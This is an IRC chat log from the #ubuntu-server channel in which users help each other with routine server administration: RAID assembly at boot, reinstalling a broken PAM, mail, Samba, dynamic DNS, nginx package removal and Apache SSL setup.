<au> libcrypt-passwdmd5-perl - interoperable MD5-based crypt() for perl
<au> libdigest-md5-file-perl - Perl extension for getting MD5 sums for files and urls
<JasonMSP> same
<JasonMSP> https://help.ubuntu.com/community/OpenWebMail  - im doing this
<JasonMSP> sudo dpkg -i owm2.53-2.deb is failing
<JasonMSP> dpkg: error processing owm2.53-2.deb (--install):
<JasonMSP>  cannot access archive: No such file or directory
<JasonMSP> Errors were encountered while processing:
<JasonMSP>  owm2.53-2.deb
<JasonMSP> nvm that last
<joschi> JasonMSP: why don't you just install squirrelmail or roundcube webmail?
<joschi> JasonMSP: there are *working* packages for them for ubuntu, in contrast to openwebmail
<JasonMSP> just got it working.
<ph8> morning all, does anyone know a little about mdadm? When I boot I get /dev/md0 could not be configured, it drops to busybox. If I use the mdadm binary in busybox to reassemble my arrays manually (by uuid) and then simply exit, it works. So the array is fine it's just an issue with the boot process. While i'm in busybox, if I look at /etc/mdadm/mdadm.conf it's got all the directives twice, in two identical blocks. This isn't the mdadm.conf that i have on
<ph8>  my machine so i'm guessing it's auto generated - does anyone know how i influence this auto generation process and get it fixed? I think this is what's stopping the boot. Running Lucid
<ph8> maybe worth copying to the forums :)
<simplexio> ph8: hmm
<ph8> it is a puzzler
<ph8> i'm guessing that's how mdadm works with 'automatic detection' on boot
<ph8> ah it would appear i can modify my initrd
<ph8> and repack
<ph8> but what happens when i upgrade?? :-s
<simplexio> my best quess is that mdadmd dosnt have anough time to figure what device belongs to which array
<simplexio> ph8: what fdisk says about your partitions ?, mine says linux raid autodetect
<ph8> yes mine are autodetect
<ph8> well it knows the uuid's
<ph8> so they're in the boot time mdadm.conf somehow
<ph8> in fact maybe i just need to do an update-initramfs
<ph8> after modifying my own mdadm.conf
<ph8> and it packages it then
<simplexio> i have 2 raid1 and one 4disk raid5 set, usually raid1 come online without problem, but raid5 usually just finds one disk and i have to mdadm --assemble --scan
<ph8> mine is raid1
<ph8> :o what does scan do
<ph8> should i be able to do that to fix the issue rather than mounting each device manually by uuid?
<ph8> hmm looks like that initramfs hasn't fixed it
<ph8> oh wait i'm lying
<ph8> that's got it
<ph8> hurray!
<ph8> so the mdadm in initramfs was bad
<ph8> i had altered the one in /etc on my system but hadn't run update-initramfs
<simplexio> ph8: --assemble --scan scan all disk and figures whihc goes to own raid array
<simplexio> even if you dont have mdadm.conf
<ph8> clever
<simplexio> one solution to your problem is define all devices in mdadm.conf
<ghaleb> hello, I've compiled PAM from source code and now I'm not able to log into the system, I got the source code from apt-src install pam. I have a preconnected session I can work with, any help ?
<denysonique_lubu> hi
<denysonique_lubu> is there a complete solution to control everything via a gui?
<denysonique_lubu> e.g. a mail server, firewall, etc
<joschi> denysonique_lubu: webmin
<joschi> denysonique_lubu: maybe ebox
<denysonique_lubu> joschi, is there a way to setup everything without actually touching the cli?
<joschi> denysonique_lubu: yes. pay someone to do it for you ;)
<denysonique_lubu> jo-erlend, to be honest I am not a fan of gui's but I would like to try something like that just once
<denysonique_lubu> for fun
<jo-erlend> joschi, hey! You stole my nick! :)
<jo-erlend> denysonique_lubu, there is nothing preventing you from running all the services on Ubuntu desktop. If it's a headless server, you can still use ubuntu desktop with a terminal server solution, like x2go or freenx.
<yann2> jo-erlend, yes you can, but when XDMCP was supported in GDM, you could even use freenx on another server to connect to a server without freenx installed :)
<jo-erlend> yann2, right. I thought the removal of xdmcp was just a temporary thing?
<yann2> not as far as I know
<jo-erlend> that was a great feature for me. I really miss it.
<yann2> so do I
<yann2> you might replace gdm with something else though, but havent tried it yet
<jo-erlend> yes, but then I could just as easily install x2go or freenx... :)
<yann2> been using 8.4s, and xdmcp was broken in KDM back then, not sure about now
<denysonique_lubu> jo-erlend, I just fired up lubuntu now and I     have a feeling to try some server apps via gui
<yann2> well I use Nomachine NX to "tunnel" to other servers via xdmxp
<jo-erlend> denysonique_lubu, cool.
<denysonique_lubu> jo-erlend, 'If it's a headless server, you can still use ubuntu desktop with a terminal server solution, like x2go or freenx' If it is headless there is no X so I can't run freenx or anything like that
<denysonique_lubu> etc
<jo-erlend> denysonique_lubu, why is there no x on a headless server? I have that on most of mine.
<yann2> I thought headless meant "without X server" :)
<denysonique_lubu> jo-erlend, well if it is headless why should I install X on it? ;p
<jo-erlend> denysonique_lubu, because you have ssh?
<denysonique_lubu> jo-erlend, are you talking about xforwarding?
<jo-erlend> yann2, I thought headless meant a server without a screen.
<jo-erlend> denysonique_lubu, well. Sort of. Pure x forwarding is way too slow to be of any practical use, but freenx and x2go is much faster and does much more.
<yann2> right  - my english isnt perfect, sorry :)
<denysonique_lubu> anyway headless == no X
<denysonique_lubu> hmm I think I will give ebox a try
<jo-erlend> denysonique_lubu, I don't understand that. Headless usually means no monitor, not no x.
<jo-erlend> but yes, ebox is nice.
<jo-erlend> yann2, have you tried spice yet? Seems awesome, but I haven't figured out how to install it on Ubuntu yet. Only Fedora. :(
<yann2> not yet now - is in the latest kvm though, really looking forward to it
<yann2> if you manage to install it on a server then I have interest yes :)
<jo-erlend> the whole point is to install it on a server. :)
<yann2> have nomachine tunnel to NX would be nice too
<denysonique_lubu> jo-erlend, spice?
<jo-erlend> denysonique_lubu, it's a pc-over-ip solution that's perfect for kvm. I've been longing to move my desktop into a data center for many years.
<denysonique_lubu> jo-erlend, just build it from source ;p
<denysonique_lubu> jo-erlend, its bad it is propriatary
<jo-erlend> it isn't. Why do you say that?
<denysonique_lubu> jo-erlend, better just set up xen
<denysonique_lubu> jo-erlend, is it free software?
<jo-erlend> of course.
<denysonique_lubu> jo-erlend, btw show me a link to that spice
<jo-erlend> http://en.wikipedia.org/wiki/SPICE_%28protocol%29
<denysonique_lubu> jo-erlend, you are right
<denysonique_lubu> btw this is spice not pcoip
<denysonique_lubu> i thought spice was a client to pcoip
<denysonique_lubu> etc
<denysonique_lubu> jo-erlend, you can't install on ubuntu?
<jo-erlend> well, there is no packages yet. You could always compile it yourself, but I suspect it's fairly complicated. Anyway, I've had other things to do. :)
<ghaleb> hello, I've compiled PAM from source code and now I'm not able to log into the system, I got the source code from apt-src install pam. I have a preconnected session I can work with, any help ?
<joschi> ghaleb: why did you do that?
<ghaleb> joschi: I read a tutorial to wright a PAM module
<ghaleb> but by mistake a compiled the entire PAM modules
<joschi> ghaleb: since you still have an open shell just reinstall pam
<ghaleb> joschi: through apt ?
<joschi> ghaleb: yes
<ghaleb> but the modules in /lib/security are exists
<ghaleb> joschi: when I type sudo su, it gives me sorry try again three times without even letting me enter password
<joschi> ghaleb: in this case you'll need to boot from a linux live cd/dvd/usbstick and fix your system from there
<denysonique_lubu> jo-erlend, no its not, it usually is ./configure && make && make install
<denysonique_lubu> etc
<jo-erlend> we really are different people. .)
<denysonique_lubu> jo-erlend, lol, in terms of what?
<denysonique_lubu> etc
<jo-erlend> joschi is not me.
<ghaleb> joschi: yep, but I still have a way to the system
<ghaleb> joschi: a preconnected session with root access
<joschi> ghaleb: well, then reinstall pam through it
<ghaleb> I'm looking for PAM in apt repo, do I have to apt-get all libpam packages ?
<joschi> ghaleb: just the ones already installed: `dpkg -l 'libpam*'`
<ghaleb> joschi: it's not working :(
<ghaleb> I reconfigured dpkg-reconfigure libpam0g
<joschi> ghaleb: if you really reinstalled (`aptitude reinstall`, `apt-get install --reinstall`) all the pam libraries and pam was the only thing you broke, it should work
<ghaleb_> joschi: even though, it's not working. There is something happened, I can't do anything related to pam, even setting new password for users
<joschi> ghaleb_: what's in your logs?
<ghaleb_> permission denied
<ghaleb_> I'm afraid to reboot
<ghaleb_> maybe I'm reconfiguring a wong package
<ghaleb_> reinstalling
<ghaleb_> joschi: YEP IT WORKED!
<ghaleb_> joschi: I reinstalled libpam0g
<ghaleb_> I've been reinstalling libpam-modules
<ghaleb_> thank you very much!
<joschi> ghaleb_: you're welcome
<ruben23> hi guys how do i check disk space particular on my / directory...
<simplexio> ruben23: df -h
<RoyK> ..--..
<ecelis> RoyK: ask your question
<ecelis> oh! sorry, I confused that with an s.o.s
<ruben23> guys how do i uninstall a source install without mke uninstall script..?
<Crankygeek> Hello,
<ghaleb_> guys, I have a problem installing pam from the source code, I compile and make install but then the system doesn't accept login nor sets passwords, any help ?
<au> try the mailing list ghaleb_
<Crankygeek> I am running a Ubuntu 10.4.1 server installation, I would like to install and run a Teamspeak server. Does anyone know what the file name is for teamspeak version 3 and is it available through the repositories?
<ghaleb_> au: which mailing list, is there a pam mailing or ubuntu-server mailing list ?
<au> ubuntu server
<ghaleb_> thanks
<\sh> Crankygeek, apt-get install teamspeak-server
<ghaleb_> anybody knows how to verbose the log more to see what happens at syslog ?
<\sh> Crankygeek, apt-cache search teamspeak would have helped you
<\sh> Crankygeek, oh and version 3 is not in the repositories...I would go then with the upstream version...and then you are out of support on ubuntu
<uvirtbot> New bug: #636363 in openldap (main) "After importing backend.ldif I get "Invalid credentials (49) "" [Undecided,New] https://launchpad.net/bugs/636363
<au> hehe ghaleb_ :) *above*
<ghaleb_> au: I see openldap bug
<gathraigin> hi all, does anyone have an idea, why I get an "postconf: fatal: open /etc/postfix/main.cf: No such file or directory" error when I restart networking?
<\sh> gathraigin, is /etc/postfix/main.cf available or is it really missing?
<gathraigin> is really missing, ther is only a master.cf
<\sh> gathraigin, there you have your problem...apt-get install --reinstall postfix eventually fix the problem
<\sh> gathraigin, if not, you have to recreate main.cf manually
<gathraigin> ok, I try that... it is a little bit unfortunate because I do not want postfix, but it was installed when I installed ubuntu-vm-builder...
<\sh> gathraigin, no it's installed because some dep of ubuntu-vm-build needs "default-mta"
<gathraigin> ah ok... I have a lot to learn ;) thanks
<\sh> gathraigin, if you do an apt-cache search mail-transport-agent you'll find some replacements for postfix
<gathraigin> hm, is postfix not a good choice as mta? or is there a better one with a smaller footprint?
<\sh> gathraigin, ssmtp is a mta replacement with a small footprint..but it depends on you what you want to do ... if you need a good mta...use the ubuntu default aka postfix
<gathraigin> ok, I found the problem with main.cf
<gathraigin> ah all right, I will research ssmtp and postfix to see which will suit my needs better... thank you \sh
<marc__> anyone know if I have to edit the hosts file in an EC2 instance?
<uvirtbot> New bug: #632934 in apache2 (main) "apache2 crashed with SIGSEGV in invoke_cmd()" [Medium,New] https://launchpad.net/bugs/632934
<dv_> hello.
<dv_> is there any reason why ubuntu server doesnt automatically install acpid in the installation=?
<dv_> i mean, I have to install it manually afterwards
<joschi> dv_: same reason why apache httpd is not preinstalled or vim or Postfix: because it's no core package which would be needed by every user
<dv_> but *acpid*?
<dv_> this is such a basic package
<joschi> why?
<joschi> dv_: I don't use acpid on *any* of my servers
<padhu> anybody dive me a link for Drupal startup guide
<sailerboy> does anyone have a recomendation for a lightweight ftp client?
<sailerboy> i tried vsftp, but half the time i cant connect
<joschi> sailerboy: vsftpd is a ftp server
<joschi> sailerboy: try lftp or ncftp if you want a good CLI ftp client
<sailerboy> erm
<sailerboy> i meant ftp server
<sailerboy> sorry
<joschi> vsftpd is a good lightweight ftp server
<joschi> sailerboy: and I doubt that your connection errors are caused by it ;)
<sailerboy> most of the connections just time out
<sailerboy> i'll try purging and reinstalling
<yann2> is it possible to create preallocated images using vmbuilder? I/o are horrible as long as the size of the disk images grows
<\sh> yann2, you should be able too
<\sh> s/too/to/
<yann2> \sh, cant find the appropriate argument
<uvirtbot> New bug: #636573 in mysql-dfsg-5.1 (main) "package mysql-server-5.1 (not installed) failed to install/upgrade: subprocess new pre-installation script returned error exit status 128" [Undecided,New] https://launchpad.net/bugs/636573
<blackmatter> quick question, what is xshm?
<nakhlawi> !xshm
<nakhlawi> http://linux.die.net/man/3/xshm
<blackmatter> with a php rfi it can work with the known php_include() from the msf framework?
<blackmatter> ok now i got it... cheers nahlawi
<nakhlawi> blackmatter: I can't help. Maybe someone else in this room can?
<nakhlawi> blackmatter: no problem.
<amstan> hey guys, you know in htop
<amstan> on the cpu meter, there's a red bar, for some reason it stays at 100%
<amstan> apparently that's kernel usage
<amstan> what could cause that?
<jpds> amstan: iowait?
<arrrghhh> figured i'd ask here too... is it possible to use the pxe boot server on my ubuntu server to image windows machines?  I got it to drop ubuntu images on workstations...
<qman__> theoretically, but IME the windows installer is too smart/stupid for that, you'd have to disk image for sure
<holstein> hello
<holstein> is this bad?
<holstein>  System information disabled due to load higher than 1
<qman__> could be
<qman__> if you are running a single core/single CPU system and your load is consistently higher than 1, you're underpowered and should upgrade
<hggdh> Daviey: just FYI, since your day starts much earlier than mine: 2.0+bzr1239 failed absolutely. See revision 55 on ~/+junk/uec-qa
<hggdh> Daviey: also, bug 636101
<uvirtbot> Launchpad bug 636101 in eucalyptus "Server ISO 20100911 failed to install eucalyptus -- eucalyptus.udeb failure" [High,New] https://launchpad.net/bugs/636101
<aarcane> heya, so on my ubuntu server, my printers are shared via samba, so it works alright, except that after rebooting my system I have to restart smbd to make the printers show up
<_Techie_> aarcane, im not sure what the others would recommend, but i would just bandage it up with a cron job
<_Techie_> @reboot /etc/init.d/smbd restart
<aarcane> hrrm, if noone else has any better ideas, I'll give that one a try.
<aarcane> I think it may have to do with cups needing time to bring the printers live though, can cron handle @reboot + however many minutes somehow ?
<_Techie_> yep
<_Techie_> gimme a min to find what im after
<_Techie_> gotta brave #ubuntu to find the command, because i cant remember it
<holstein> qman__: i am on a single core box
<holstein> but the percentage is low
<holstein> CPU useage
<holstein> in top
<_Techie_> aarcane, got the command
<_Techie_> add this to your crontab -e
<_Techie_> @reboot sleep [seconds] && /etc/init.d/smbd restart
<_Techie_> give it 30 seconds to be on the safe side
<_Techie_> so @reboot sleep 30...
<aarcane> I'm thinking @reboot; smbd start instead of restart, and only adding k20s to runlevels 0 1 6...  that way it won't be started twice.
<_Techie_> aarcane, nah, issue restart that way any current PID is killed and if theres no current PID then its started anyway
<_Techie_> also means you dont have to do more than you have to
<aarcane> seems kinda wasteful to start it twice.
<_Techie_> aarcane, it wont be started twice
<_Techie_> on boot when smbd is launched it will creat a PID file, when the restart is issued, then the old process will be killed safely, and then started again... one smbd at a time, nie and clean
<_Techie_> nice*
<aarcane> yeah, but started->stopped->started, instead of started only once.
<_Techie_> id rather have it start stop start instead of possibly screwing up all together
<_Techie_> is there any disk cloning utility that i can control via a web panel, preferably AJAX
#ubuntu-server 2011-09-05
<qman__> then consider this an important lesson in system administration -- before you change something, take note/save a copy of the old setting
<multiHYP> oh its messy
<multiHYP> i didn't know ufw existed even :(
<multiHYP> out of security concerns rushed it
<qman__> a rush job is never secure
<multiHYP> is it harmful to just remove those iptables rule files?
<qman__> save a copy and try it to find out
<multiHYP> this is big responsibility even for my own little things
<multiHYP> :S
<multiHYP> like being a guard at the door of a bank or something
<qman__> as previously mentioned, ubuntu is secure by default, you should take your time when installing packages and pay attention to the changes you make, as that's where most systems' points of failure are
<qman__> unless you use a really poor password, even the default SSH is reasonably secure
<qman__> think about it this way, who do you trust to be better at security
<qman__> random blogger posting guides on the internet, or the package maintainers
<multiHYP> wow, im glad rm * didn't remove the .files
<multiHYP> i was in my ~ directory and wanted to remove those temporary iptables files and used rm *
<multiHYP> no way, i am trying to learn these for myself, so that if something goes wrong i can rectify the situation, i keep things well documented :D
<multiHYP> cannot remove my vm and recreate a brand new one. and keeping backups is expensive. at least for now not worth backing up
<multiHYP> why is my ubuntu not having aptitude and what is interpidâ¦?
<Pici> multiHYP: er, what do you mean?
<multiHYP> sudo aptitude install nginx
<multiHYP> sudo: aptitude: command not found
<multiHYP> am i supposed to install aptitude via apt-get and then use it to install nginx?
<Pici> aptitude is just another apt frontend, you can us either to install nginx.
<multiHYP> no, nginx doesn't work with apt-get at all
<multiHYP> oh wait it did
<multiHYP> then it wasn't working with brew on mac
<multiHYP> im mixing everything up now
<multiHYP> sorry
<Pici> its okay, I'm only slightly confused.
<tiphares> how to benchmark a server through a shell?
<tiphares> like CPU/ram etc
<JRWR> I am having a issue with mod_shared_roster_ldap - It seems to be crashing, here is a related pastebin with all the info that should help, http://pastebin.com/hkZung2p
<multiHYP> ldap on mac lion has a huge bug
<multiHYP> be careful
<JRWR> ubuntu all the way
<multiHYP> is it possible to set nginx to autostart on startup
<multiHYP> ?
<multiHYP> JRWR: yep, ubuntu is most solid and hassle free
<JRWR> multiHYP: uing init scripts, yes
<multiHYP> how?
<JRWR> multiHYP: also I am a total ldap newbie
<JRWR> updaterc.d (I think) go google it :)
<multiHYP> i tried using it, but didn't need it really, unless you are in a corporate or something
<JRWR> large project
<JRWR> 100 people authing into 40 differnt programs
<multiHYP> wow, yeah ldap might be handy :D
<multiHYP> whats the advantage of running ntp all the time?
<twb> multiHYP: that your clock stays correct.
<multiHYP> why is apt-get remove --purge not cleaning my os from the installed application?
<multiHYP> i used apt-get install to setup it up anyway...
<twb> I don't understand the question.
<twb> multiHYP: what application?  That is, what package name?
<multiHYP> i installed nginx with apt-get and tried to uninstall it, but things about nginx are still on my system
<twb> What do you mean "things about nginx" ?
<multiHYP> apart from having only 0.8.54 on apt-get repository where the latest is 1.0.6, it cannot be removed cleanly as expected.
<multiHYP> files and folders
<multiHYP> basically apt-get remove nginx --purge doesn't do what it supposed to on ubuntu 11.04
<multiHYP> :o
<twb> pastebin the output of "dpkg -l '*nginx*'"
<pmatulis> multiHYP: what is this ldap lion bug?
<multiHYP> you can login as anybody, as soon as you have the public settings
<multiHYP> i don't know exactly but its a major embarrassment.
<pmatulis> multiHYP: so ldap server on lion then?
<multiHYP> pmatulis: not sure ldap server or just ldap, but yes the bug is related to os x lion implementation.
<twb> multiHYP: uh, you got a CVE reference for that?
<multiHYP> http://pastebin.com/ujMtyDby
<multiHYP> what is CVE?
<twb> !MITRE
<twb> !CVE
<twb> Ugh, why can't ubottu just have all of dpkg bot's info entries.
<twb> multiHYP: MITRE CVEs are a central reference point for vulnerabilities, irrespective of the project they occur in
<multiHYP> are those applications too?
<multiHYP> still unclear
<twb> http://cve.mitre.org
<twb> As to your nginx issue, when you ask for a package to be installed, it pulls in all dependencies.  When you ask for a package to be removed, it doesn't (by default) remove obsolete dependencies.
<multiHYP> so --purge supposed to clean though
<twb> multiHYP: what has happened is you asked for nginx, which has pulled in nginx-full (the real program) and nginx-common (the support files), and these have not been removed by your attempt to purge "nginx", which only removed the wrapper package.
<multiHYP> someone tested the same thing on debian
<multiHYP> and it worked!
<multiHYP> oh
<twb> multiHYP: on an older system, nginx was not simply a wrapper for nginx-full.
<twb> You probably want to look into "apt-get autoremove"
<twb> "purge" is the same as "remove", except that it also removes config files.  Remove will remove everything *but* the config files, but only of the packages you explicitly list.
<multiHYP> how can i make sure that its now gone for good?
<twb> multiHYP: purge the relevant packages
<multiHYP> i did, i did autoremove evne
<multiHYP> these are the main ones remaining: http://pastebin.com/sGUwrXMW
<multiHYP> removed them manually
<multiHYP> what a pain, is apache as bad as nginx?
<warning123> hi all i have connected to my server through ssh , i started a game server and it had terminal showing me the live processing... but then after ssh disconnected when i relogged in , im back to root , how can i check that live processing again , i dont want to open the same process i want to go back to that window
<blsh0p> what is ubuntu server?
<KoolaidJunkie> Its used to run web server, game server, etc
<warning123> blsh0p, http://en.wikipedia.org/wiki/Server_(computing)
<KoolaidJunkie> Or click that. lol
<KoolaidJunkie> I need some help with DDCLIENT. Im trying to update my IP with DynamicDNS service. But its sending my local ip (the one behind the router) instead of my external ip
<twb> KoolaidJunkie: you need to run ddclient on the host that has the public IP address, i.e. the one doing PPPoE or PPPoA.
<twb> KoolaidJunkie: if this is not possible, you need to find some what for ddclient to learn that address
<twb> multiHYP: what depends what you mean by "bad".
<KoolaidJunkie> twb: how can I make DDCLIENT learn that address. Ubuntu Server is running on a Desktop PC hardwired to the router.
<twb> I don't know.
<multiHYP> well, hard to remove things and reverse to a previous (before installation) state.
<warning123> KoolaidJunkie, < are u connected > to a < router > then < another router > = then > internet < ? , or 1 router to the internet? if 1 router then activate DMZ on the computer with DDCLIENT to allow it to be the DHCP -CEO which is like connecting from you to the WAN ( internet ) .
 * twb thinks: I should stop being so helpful, this channel is getting to be as bad as #ubuntu...
<KoolaidJunkie> warning123, there is only 1 router. and the computer running Ubuntu Server is hardwired to the LAN1 port
<twb> KoolaidJunkie: I usually address it by putting Ubuntu on the router
<KoolaidJunkie> I don't think ubuntu will run the router. if it can I have no clue how to flash it to it
<twb> KoolaidJunkie: right; you would probably need a new router and a new ADSL modem or ATM card.
<twb> KoolaidJunkie: the other approach, of course, is to get a static IP from your ISP.
<KoolaidJunkie> Yeah, thats a little extreme when all I want to do is run a Teamspeak Server
<twb> Shrug.
<warning123> KoolaidJunkie, does ur router have Dyndns functionality ? if not try editing DDCLIENT to be able to read ur WAN ip and not local , im guessing u will need it to check online and not locally
<twb> !u
<ubottu> U is the 21st letter of the modern latin alphabet. Neither 'U' nor 'Ur' are words in the English language. Neither are 'R', 'Y', 'l8', 'Ne1' nor 'Bcuz'. Mangled English is hard for non-native English speakers. Please see http://geekosophical.net/random/abbreviations/ for more information.
<warning123> ubottu, thanks
<ubottu> You're welcome! But keep in mind I'm just a bot ;-)
<KoolaidJunkie> warning123, I set DMZ in router. How should I config DDCLIENT now?
<JRWR> I am having a issue with mod_shared_roster_ldap - It seems to be crashing, here is a related pastebin with all the info that should help, http://pastebin.com/yMVVKN5W
<warning123> KoolaidJunkie, /etc/ddclient.conf file
<KoolaidJunkie> warning123, thanx. i got it now. by changing to use=web, web=dyndns its pulls the external ip
<warning123> KoolaidJunkie, np
<Dravekx> hi
<Dravekx> anyone good with LAMP and ssl certs on ubuntu server?
<twb> !anyone
<ubottu> A high percentage of the first questions asked in this channel start with "Does anyone/anybody..." Why not ask your next question (the real one) and find out? See also !details, !gq, and !poll.
<Dravekx> I have LAMP installed on Ubuntu Server  11 and Im trying to install an SSL cert, but not sure exactly where it goes?
<delerium_> might help: https://help.ubuntu.com/8.04/serverguide/C/httpd.html
<Dravekx> yeah reading that.
<delerium_> Also depends if you want to use a self sign or a certificate signed by a vendor (verisign, entrust, etc,etc)
<Dravekx> vendor. already have the cert. need to install it.
<delerium_> and I guess it's for Apache. right^
<Dravekx> yeah. I just did the request.
<Dravekx> one page says to keep them together in /etc/ssl and the other says to put them in the /certs and /private directory. I'm not sure what is correct.
<Dravekx> I guess it doesnt matter as long as the links are correct.
<delerium_> I think they can be in wathever path you put in your .conf file (honestly, I never install cert on Apache, only on Netscape / IHS / WAS).  But it should be pretty similar
<twb> Dravekx: read the version appropriate to your install verison -- not necessarily 8.04
<delerium_> twb: yeah. my bad on this
<Dravekx> here's two directories: sites-enabled and sites-available. one has default and default-ssl, and the other has 000-default. Everything is running from 000-default. how do I enable both the default and the default-ssl?
<Dravekx> I need the default for port 80 /var/www and the ssl for port 443 /var/www-ssl
<qman__> Dravekx, sudo a2ensite sitename
<Dravekx> qman__ ahh right.
<qman__> then reload or restart apache
<twb> The reason it's 000-default is simply because apache has no concept of "default" -- the vhost it defaults to is the first one in the config file
<Dravekx> twb if I need default and default-ssl running, would I made one configuration file for both, or keep them separate?
<multiHYP> where is the standard place to install stuff in ubuntu? i have admin privileges but as a normal user where should i install my stuff such as webserver and other applicationsâ¦?
<twb> everything in -enabled is considered part of "the" config file
<qman__> multiHYP, normal users don't install web servers or applications
<qman__> normal users use the applications
<multiHYP> ok so this is an admin thing, then i need to know for both, admin as well as normal user application ilocations.
<qman__> the standard process is to use apt-get, or at the very least, dpkg to install software
<qman__> compiling from source and manually installing is not recommended
<multiHYP> but some packages aren't available or as up to date as one hopes via those methods.
<twb> The way normal users get packages installed, is to call the sysadmin and beg him to install it
<qman__> if you must compile from source, you should build a .deb package and install it
<multiHYP> how is that done? i thought .deb was for debian only.
<qman__> ubuntu is built from debian, and uses debian's package management system
<qman__> don't take that to mean you can install debian packages on ubuntu, the dependency tree is different
<multiHYP> oh so why use ubuntu instead of debian anyway?
<twb> Because Debian is less forgiving of idiots.
<multiHYP> i thought ubuntu would make things easier than so many other kinds of linux distros
<qman__> it's a matter of user preference
<qman__> as is almost any choice of distribution
<multiHYP> so okay this seems like a solid idea actually, i get the .tar.gz and make a .deb package out of it for install/deinstall and remove the .tar.gz
<multiHYP> so later i can reuse the .deb package
<qman__> the point of packaging a manual compile is so that it can be easily removed from the system later
<multiHYP> yes, its exactly what i need too. had a hard time manually removing a bad pkg with different dependencies...
<qman__> again, compiling manually should be a last resort
<qman__> you lose a lot of benefits
<multiHYP> i know, there is no .deb package for this application
<twb> multiHYP: you should be asking yourself "do I really need this package?"
<multiHYP> at least this version of the application, also the one i got through apt-get was a bad package, because it wasn't removed cleanly afterwards
<qman__> incorrect
<qman__> you simply did not remove all the packages it depended on
<multiHYP> well i didn't know that was possible
<multiHYP> i didn't know it was depending on anything actually
<qman__> when you install software it informs you of everything which is being installed
<qman__> this includes dependencies and recommends by default
<multiHYP> hence, i thought by removing it would know that by itself. kind of counter intuitive, don't you think?
<qman__> you installed a meta package
<qman__> meta packages don't actually contain software, they're just there to make it easy to install a set of packages
<qman__> for example, linux-image
<multiHYP> how to identify meta packages?
<qman__> this is a meta package which gets you the latest kernel packages
<qman__> look at the dependencies of a package
<qman__> it will tell you what it installs to do what you told it
<multiHYP> i didn't even have apt-rdepends :D
<multiHYP> they might as well give the kernel.h file and let me figure out the rest of it...
<multiHYP> i guess im better off using the older 0.8.54 version that is available via apt-get. its at least the standard way of doing things...
<multiHYP> i mean there is no nginx-1.0.6.deb or something like that.
<multiHYP> which brings me to what i was going to do, either make a .deb out of source or install the old version.
<multiHYP> why is not a single user creating a .deb for that if that is the way things should work? nginx is very popular.
<qman__> for security and maintenance reasons
<qman__> each release of ubuntu sticks with a certain major version of a package
<twb> multiHYP: 1.0.5 is packaged as a .deb, but it is not in your release, because new versions = new bugs.  Ref. http://paste.debian.net/128442/
<qman__> the version you have released when 0.8 was considered stable and production ready
<qman__> so only updates to 0.8 are available in the normal channels for that release
<multiHYP> so it is even encouraged that i should stick to that because its best for my os
<qman__> bugfixes and features can also be backported to older versions, and the packages look like software1.2-ubuntu3 in those cases
<multiHYP> how is the removal of such meta packages possible without accidentally removing a common dependency that i don't want to remove?
<multiHYP> do i have to manually keep a list on paper that checks for packages and their corresponding dependencies?
<qman__> unless there is a very compelling reason to use a different version, such as a dealbreaking feature or fix, you should stick with the version available in the repositories
<qman__> that's what apt-get autoremove is for
<qman__> it removes packages which were installed only as dependencies, but the packages that depended on them are gone
<qman__> however, if you manually install a package that was installed as a dependency later, it will be marked as one you wanted and won't be removed by this
<multiHYP> ok
<qman__> example, if you install nginx, then later install nginx-common, then uninstall nginx, then autoremove
<qman__> nginx-common would stick around, as would its dependencies
<qman__> because you marked it as one you want
<multiHYP> because i installed it separately?
<multiHYP> ok i see
<multiHYP> so is this correct if i follow the standard procedure: sudo apt-get autoremove nginx :to remove nginx and all its dependencies?
<qman__> no
<qman__> just 'sudo apt-get autoremove'
<qman__> removes all orphaned dependencies from the system
<multiHYP> ok, see i saw that line on a website and was about to try it out, there are so much mis-information online ...
<multiHYP> i believe i messed things up during my manual removal process, can i force reinstall something with apt-get again?
<qman__> you can apt-get install --reinstall
<qman__> but you need to make sure you get the right package
<qman__> reinstalling one package won't affect the dependencies
<multiHYP> something doesn't work anymore, i did that yeah. the installation appears to be successful after that but the binary is missing...
<multiHYP> :(
<Dravekx> how do I get bash aliases to work for a specific user? I set with alias command="" but it's not working.
<Dravekx> oh wait. maybe I need to load screen first.
<KoolaidJunkie> Could someone help with a External IP issue? I'm unable to access the server from outside the network, through the External IP
<multiHYP> hi, is there a command i could use as root to set the sshd_config parameter to allow login via passowrd?
<ersi> Yeah, vim /etc/sshd/sshd_config >_>
<jamespage> Daviey: I've not actually managed to get a successful PPA build of the new version of jenkins as yet - not due to the issue you found - but due to some other dep changes I had in the PPA
<jamespage> however I did successfully sbuild it on a headless server  - so I really don't understand why your pbuild failed...
<Daviey> jamespage: So it failed to build in a PPA?
<Daviey> I didn't check back after the 2 hours*
<Daviey>  * where 2 hours was probably 10.
<jamespage> it was more like 10
<jamespage> The PPA I did the test build in contained the new version of jtidy (waiting for ack on FFE for that)
<jamespage> which broke the build in a different way
<Daviey> jamespage: Did you push to a different PPA /OR? did it at least get past the issue i thought i saw?
<jamespage> Daviey: so I'm happy to hold this update back to fix that issue as well
<jamespage> I have now pushed it to a different PPA
<Daviey> Does it need to build against a newer jtidy?
<jamespage> https://launchpad.net/~james-page/+archive/oneiric/+build/2766025
<Daviey> Not that i can even pretend to know WTF jtidy is :)
<Daviey> Start in 12 hours, seriously?
<jamespage> :-)
<jamespage> ;-(
<jamespage> :-/
<Daviey> ... and people wonder why we push untested stuff to the archive.
<jamespage> yeah
<jamespage> I should fix the jtidy upgrade issue as well - its not a code incompatibility - its just that the maven artifact moves so the build does not pick it up and fails
<Daviey> ah
<Daviey> well failing to build because of a dep, i'm less concerned about.
<koolhead11> hi all
<koolhead11> RoAkSoAx: hey there.
<jamespage> Daviey: yes - but I still don't understand the test failure you saw
<jamespage> I might repro you pbuilder environment to see if I can reproduce
<jamespage> hi koolhead11
<koolhead11> jamespage: hey there. need little help
<koolhead11> the preseed example file is not providing much info to me for manual partitioning
<koolhead11> https://help.ubuntu.com/8.04/installation-guide/example-preseed.txt
<koolhead11> d-i partman-auto/expert_recipe string
<koolhead11> http://paste.ubuntu.com/682443/
<koolhead11> what is  64 512 300% linux-swap   ??
<koolhead11> what is this 300%
<koolhead11> ?
 * jamespage looking
<koolhead11> Daviey: hello sir
<koolhead11> kim0: hey. :)
<just-a-visitor> http://edwardpku.com/cun/2008/05/05/partman-auto-recipe-files/
<koolhead11> just-a-visitor: awesome. thanks a lot. jamespage lemme read on the url. #awesome :D
<Daviey> koolhead11: hello!
<jamespage> thats one to bookmark
 * jamespage struggling with ADSL upload killing my Internet performance today
<koolhead11> Daviey: how have you been? :)
<koolhead11> jamespage: just going to bookmark it now. :P
<Daviey> just-a-visitor: that is a good example!
